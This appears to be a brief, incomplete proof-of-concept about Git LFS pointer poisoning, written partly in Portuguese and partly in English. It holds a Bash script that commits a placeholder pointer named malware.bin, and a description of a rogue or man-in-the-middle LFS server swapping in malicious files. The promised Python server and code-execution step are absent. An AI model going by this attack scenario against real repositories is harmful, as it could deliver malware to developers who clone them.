
Prova de conceito para envenenamento de ponteiros do Git LFS, com scripts Bash e Python que criam um repositório malicioso, simulam um servidor LFS malicioso e acionam a execução de código.
# create_malicious_repo.sh - Sets up a repo with poisoned LFS pointer
git init
git lfs track "*.bin"
echo "version https://git-lfs.github.com/spec/v1
oid sha256:4142434445464748494a4b4c4d4e4f505152535455565758595a616263646566
size 4" > malware.bin
git add .gitattributes malware.bin
git commit -m "Add LFS file"
Um repositório usa Git LFS, mas não fixa o endpoint LFS nem verifica hashes de objetos após o download. Um atacante que comprometa o servidor LFS (ou possa realizar um ataque man‑in‑the‑middle) pode substituir o arquivo grande por um malicioso, e o clone fará o download automático e possivelmente o executará.
bash create_malicious_repo.sh
# Then simulate rogue LFS server